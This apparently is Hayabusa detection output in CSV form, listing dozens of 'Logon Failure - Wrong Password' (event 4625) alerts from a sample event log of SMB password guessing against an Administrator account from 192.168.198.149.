Administrator | Type: 3 | Computer: 4XLVQRnkUd3bfgvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rHjqFQwqpCJFI6qP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L5pEWq2mYsFpFLbb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSFKJXTC2wlyw0gu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vh5igCJpAA5rmqzV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5NzLlJWkfXDcm64c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9sR1QHgZ4oaa82F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pq1GWcKzSHSP28hk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: agCtM0s62zXPop0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVvglj7RtxrBUeXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMbS0sIpbFDqJvMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldO0cAZ54BRHHDyz | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmJH2QWFPiYarKh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5fCiyHtI0OTo8pBO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3vkVuU43tsYHUSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.714 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3w21sFOu2u7FTDZM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bk7eaqQNK1CEgqoj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Rv5joLgkm3QUYPyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4l15usDM7jggwEyw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9QpOvgDmiOgzQqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dqyr8tb9TrO1aJNe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hI1bzjixP8eOdDbw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMTAp20wXS3d1OCk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrQGfxInmlgPqGtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcsMMQbsnUdyLJWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oRYZqBBsq9GyApI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0TAhib6p8fY5iOgI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FerGHj9abOe6ehZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kN4B4KLpXbyKZzGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HJtoyRfP38T3KToO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkI5hLApUWhGnKIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZCPSO4JLjMur2Eow | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHmrv2xFuq7TyIQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8SqYq3msNfFh24lg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YE0a2Bypzc1MMdGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ojgIg88VK6hB72PI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehLrf2GoAhY3Rf7Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ccfgpjwpis15B4gY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vysSf3DsOxQf5fVd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEp88cEeiNw4IQsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5PXDJPzw0gPdlCiH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mwoe9IgWx2UZ7Iuu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3eW0nFDUwKFzoQIw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q0i0p5QxJ4ykYYJt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VsxqWAnd6j2CdyB3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5qdy80mtFWl199k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ce0d84uBK4t2sqR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4dZYZEW1VijjwHN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmqGJWbeap5dv0gC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaNUqChgVSbDkFQu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B4PDZ55it0V4QGnM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQxXVB8Aj5gaw2f2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzDeZtgSJoH74GYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iNAFsZraFvw67WWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aVdnbyzWqk58rOW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjUH2PopXCrrPzqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ylmV2z3WjTWsTpyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qBKZTYRTKuEAgS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JvekO4A5f6QK2ynZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDUqydSeA1guOjIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o71TltsJDyOIuLQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXT3MSCes42dVCNn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FGXiWeT8Evr6G70M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V2RarzrnGgcLaseH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3k7dXu9o1vMkhby | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EDBt76dmYnPstFWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4yjzMC7cw0fe7gjS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eQOWCM7KP68DZTX9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kn9WWWqCIwfrPbie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AQcamLSzsXOjP6FL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6R6ZMRoYkAPB35Bq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubqnZm0jmHNFCHrM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ORQ8vL1oo6CkJXK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rDPl1SSddrWEs979 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrK7fENAr1lxFr9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
